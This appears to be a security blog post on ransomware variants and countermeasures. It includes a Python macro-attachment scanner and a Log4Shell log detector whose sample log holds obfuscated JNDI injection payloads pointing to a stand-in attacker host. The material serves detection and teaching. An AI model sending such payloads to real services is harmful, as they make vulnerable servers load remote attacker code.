
Ransomware- A Reality Check (Part 2)


Variants of Ransomware

Bad Rabbit: Distributed in 2017 as a fake Adobe Flash Player update served from compromised websites. The victim had to download and run the fake installer themselves; once it executed, the victim's files were encrypted and the malware attempted to spread to other hosts on the network.

CryptoWall: Delivered through malicious email attachments, typically executables hidden inside zip files, and through exploit kits that abused browser plug-in vulnerabilities such as Java to install it silently. Once the payload runs it encrypts the victim's files and demands payment for the decryption key.

Petya: A crypto-ransomware family that targets Windows servers, laptops and PCs. Its 2017 NotPetya variant abused SMB (Server Message Block) and harvested credentials from the infected host to spread laterally to other machines on the same network.

WannaCry: First seen in May 2017 in a large-scale crypto-ransomware outbreak that hit more than 200,000 machines worldwide. It spread as a worm between unpatched Windows hosts by exploiting the SMBv1 vulnerability MS17-010 (EternalBlue), so no user interaction was needed.

BlackByte: A ransomware variant that, according to a 2022 FBI advisory, compromised multiple US and foreign businesses, including at least three US critical infrastructure sectors. It encrypts files on compromised Windows hosts, including physical and virtual servers.


The following countermeasures or defense mechanisms should be implemented to reduce both the likelihood and the impact of a ransomware infection:


Using the firewall to its fullest capability

Firewalls and email security gateways are the first line of defense. If the firewall drops a malicious web request, or the email gateway quarantines a malicious attachment, the user never sees the attack at all. But no single control is perfect: when the firewall fails or is bypassed, the controls below must already be in place as backups (defense in depth).

Log4Shell (CVE-2021-44228) is a good illustration. It was a vulnerability in Apache Log4j, a Java logging library rather than a web server, and it was exploited in the wild within hours of disclosure. The first widely observed attacks targeted Minecraft game servers; the same payloads were then turned on corporate servers that logged attacker-controlled input.

User Education

Even if an email passes through the email security gateway and the firewall, a user who cannot recognize a phishing email becomes the attack surface. Training turns that user into another layer of detection instead.

Kevin Mitnick, probably the most notorious hacker of the 1990s, began by social-engineering people over the telephone, and the FBI spent years pursuing him. He later joined KnowBe4, a company whose security awareness training teaches users how to recognize phishing and how to handle emails from unexpected or unknown senders.

Disabling macro execution

Macro execution is one of the most common ways users get exploited. A malicious document arrives as an email attachment; the user assumes it is legitimate, opens it and enables the macros, and the code runs with the user's privileges on the organization's network.

Macros are small programs, usually written in Visual Basic for Applications (VBA), embedded in Office documents and executed by the Office application. Malicious macros typically download and run the ransomware payload rather than exploiting a software vulnerability: the user's click is the exploit. Disabling macros by default, and blocking macros in documents that came from the internet through Office's Trust Center settings or Group Policy, removes this vector.
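To make the point concrete, here is an added example (not code from the article or from InfosecTrain) of the check a mail gateway or endpoint script can perform before a document ever reaches a user: inspect the file's contents for a VBA project instead of trusting its extension. Office Open XML files (.docx, .docm, .xlsx, .xlsm) are zip archives; macro code is stored in a part named vbaProject.bin, and macro-enabled formats declare a content type containing "macroEnabled" in [Content_Types].xml. The sample documents are constructed in memory, and the function and file names are my own.

```python
"""Flag Office Open XML attachments that carry VBA macros.

Added example, not from the original article. Office Open XML files
(.docx/.docm/.xlsx/.xlsm/.pptx/.pptm) are zip containers. VBA code lives in a
part named vbaProject.bin, and macro-enabled formats declare a content type
containing "macroEnabled" in [Content_Types].xml. Checking the contents rather
than the file extension catches a .docm that was renamed to .docx.
"""
import io
import zipfile

CONTENT_TYPES_PART = "[Content_Types].xml"
VBA_PART_SUFFIX = "vbaproject.bin"          # compared case-insensitively
MACRO_ENABLED_MARKER = b"macroEnabled"      # e.g. ...ms-word.document.macroEnabled.main+xml


def classify_attachment(data: bytes) -> str:
    """Return 'macro', 'clean' or 'unsupported'.

    'unsupported' means the bytes are not an OOXML zip container (legacy
    OLE2 .doc/.xls files, or a non-Office file with an Office extension);
    those need a different parser and must not be assumed clean.
    """
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            names = zf.namelist()
            if CONTENT_TYPES_PART not in names:
                return "unsupported"           # a zip, but not an Office document
            if any(n.lower().endswith(VBA_PART_SUFFIX) for n in names):
                return "macro"                 # VBA project present
            if MACRO_ENABLED_MARKER in zf.read(CONTENT_TYPES_PART):
                return "macro"                 # macro-enabled format declared
            return "clean"
    except zipfile.BadZipFile:
        return "unsupported"


def has_vba_macros(data: bytes) -> bool:
    return classify_attachment(data) == "macro"


def _build_ooxml(with_macros: bool) -> bytes:
    """Construct a minimal Word document in memory (constructed sample data)."""
    main_type = (
        "application/vnd.ms-word.document.macroEnabled.main+xml"
        if with_macros
        else "application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(
            CONTENT_TYPES_PART,
            '<Types><Override PartName="/word/document.xml" '
            f'ContentType="{main_type}"/></Types>',
        )
        zf.writestr("word/document.xml", "<w:document/>")
        if with_macros:
            # A real vbaProject.bin is an OLE2 compound file; the header is enough here.
            zf.writestr("word/vbaProject.bin", b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 24)
    return buf.getvalue()


# Constructed attachments: names are illustrative, contents built above.
SAMPLE_ATTACHMENTS = {
    "quarterly_report.docx": _build_ooxml(with_macros=False),
    "invoice.docm": _build_ooxml(with_macros=True),
    "invoice_renamed.docx": _build_ooxml(with_macros=True),                    # extension lies
    "legacy_contract.doc": b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1" + b"\x00" * 56,  # OLE2, not a zip
}


def scan_attachments(attachments: dict) -> dict:
    """Map each attachment name to its verdict."""
    return {name: classify_attachment(data) for name, data in attachments.items()}


if __name__ == "__main__":
    for name, verdict in scan_attachments(SAMPLE_ATTACHMENTS).items():
        print(f"{name:24s} {verdict}")
```

The renamed document is the case worth noticing: a gateway rule that blocks only the .docm extension lets it through, while content inspection flags it. Legacy binary .doc files come back as "unsupported" rather than "clean" on purpose; they store macros in an OLE2 stream and need a separate parser.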

Implement Web security

Cross-site scripting and drive-by downloads: if a website you trust can be made to serve attacker-controlled script, or your browser (or one of its plug-ins) has an unpatched vulnerability, simply visiting the page is enough for the malicious code to run. No download prompt and no click are required.

The website of the well-known chef Jamie Oliver was compromised this way: visitors had malicious code downloaded in the background just by browsing the site. To reduce this risk, organizations should keep browsers and plug-ins patched, implement WAF rules on the sites they operate, and enable ad blocking, since malicious advertising is a common delivery route for exactly this kind of code.


Incorporate least privilege policy

Role-based access control and reliable backups are the most important pieces here. Users receive only the privileges needed to perform their job, not full administrative access, so malware running under that user's account inherits the same limits. Backups should be kept where a compromised user account cannot modify or delete them. Both measures are part of a defense-in-depth strategy.

Network Segmentation

The HR department receives far more external emails with document and PDF attachments than the software development department does. Should both groups sit on the same flat network if the goal is strong security?

If someone in HR clicks a malicious attachment, the malware starts spreading through the environment. Wipro, an IT services provider, is an example from the MSSP world: its breach turned into a supply chain attack on its customers because some team had clicked a malicious URL that gave the attackers a way into the network. Segmenting the network would have limited how far they could move.

Active monitoring

Security analysts in a Security Operations Center (SOC) monitor alerts 24/7, tune detections and identify attacks. For example, when a SOC saw Log4Shell being probed, on the order of 3,000 exploitation attempts, it wrote alerts and blocking rules for the attempt pattern and notified the affected teams, which made it possible to investigate and block the source IP addresses.
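As an added example (not code from the article), here is the kind of detection logic a SOC would run over web server logs for the Log4Shell case mentioned above and in the firewall section: normalize the common obfuscations attackers used to dodge a naive "${jndi:" match (case tricks via ${lower:} and ${upper:}, default-value lookups such as ${::-j} or ${env:X:-j}, and URL encoding), then count attempts per source IP so a threshold alert can fire and the source can be blocked. The log lines are constructed in the Apache combined format using documentation IP ranges, and the function names are my own.

```python
"""Detect Log4Shell (CVE-2021-44228) exploitation attempts in web server logs.

Added example, not from the original article. Attackers rarely send the plain
string ${jndi:...}; they wrap it in Log4j lookups that evaluate to the same
text, so the detector resolves those lookups before matching.
"""
import re
from urllib.parse import unquote

# ${lower:j} / ${upper:J}  ->  j
_CASE_LOOKUP = re.compile(r"\$\{\s*(?:lower|upper)\s*:\s*([^${}]*)\}", re.IGNORECASE)
# ${::-j} / ${env:NOPE:-j} / ${sys:NOPE:-j}  ->  j   (default-value syntax)
_DEFAULT_LOOKUP = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
# What every variant eventually evaluates to
_JNDI = re.compile(r"\$\{\s*jndi\s*:")


def normalize(text: str) -> str:
    """Undo URL encoding and innermost-first lookup obfuscation, then lowercase."""
    s = unquote(text)
    for _ in range(16):  # bounded loop: nesting depth in real payloads is small
        resolved = _CASE_LOOKUP.sub(lambda m: m.group(1), s)
        resolved = _DEFAULT_LOOKUP.sub(lambda m: m.group(1), resolved)
        if resolved == s:
            break
        s = resolved
    return s.lower()


def is_log4shell_attempt(line: str) -> bool:
    return _JNDI.search(normalize(line)) is not None


def find_attempts(log_text: str) -> list:
    """Return (source_ip, normalized_line) for every matching log line."""
    hits = []
    for line in log_text.splitlines():
        if is_log4shell_attempt(line):
            source_ip = line.split(" ", 1)[0]   # first field in combined log format
            hits.append((source_ip, normalize(line)))
    return hits


def count_by_source(log_text: str) -> dict:
    counts = {}
    for source_ip, _ in find_attempts(log_text):
        counts[source_ip] = counts.get(source_ip, 0) + 1
    return counts


def sources_to_block(log_text: str, threshold: int) -> list:
    """Source IPs with at least `threshold` attempts, for an alert or block list."""
    return sorted(ip for ip, n in count_by_source(log_text).items() if n >= threshold)


# Constructed sample (Apache combined format, RFC 5737 documentation addresses).
SAMPLE_LOG = """\
203.0.113.10 - - [10/Dec/2021:21:03:11 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.77 - - [10/Dec/2021:21:03:15 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.5:1389/a}"
203.0.113.77 - - [10/Dec/2021:21:04:02 +0000] "GET / HTTP/1.1" 200 512 "-" "${${lower:j}ndi:rmi://198.51.100.5:1099/b}"
203.0.113.78 - - [10/Dec/2021:21:05:40 +0000] "GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Adns%3A%2F%2F198.51.100.5%2Fc%7D HTTP/1.1" 404 0 "-" "curl/7.79.1"
198.51.100.200 - - [10/Dec/2021:21:06:00 +0000] "GET /docs/log4j-upgrade.html HTTP/1.1" 200 900 "-" "Mozilla/5.0"
"""

if __name__ == "__main__":
    for source_ip, line in find_attempts(SAMPLE_LOG):
        print(source_ip, "->", line[-60:])
    print("attempts per source:", count_by_source(SAMPLE_LOG))
    print("block at >=2:", sources_to_block(SAMPLE_LOG, 2))
```

Two details matter in practice. The last sample line mentions log4j in a URL path and must not fire, which is why the match is on the evaluated "${jndi:" lookup and not on the word itself. And the payload arrives in whichever field the application logs (User-Agent, query string, a header), so the whole line is normalized rather than one column.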

Action Plan

It is not a question of whether you will be attacked but when. Even organizations with strong security get compromised, and an incident response action plan is what makes the difference at that point.

A clear, detailed plan of what to do and how to do it when an attack occurs, including which countermeasures to apply first (isolate affected hosts, revoke exposed credentials, restore from clean backups), lets the team respond quickly instead of improvising under pressure.


Emaliya Keerthana
Content Writer
Emaliya Keerthana works as a Content Writer at InfosecTrain. She likes to explore the latest technology, writes on emerging IT-related topics and is passionate about sharing her thoughts through blogs.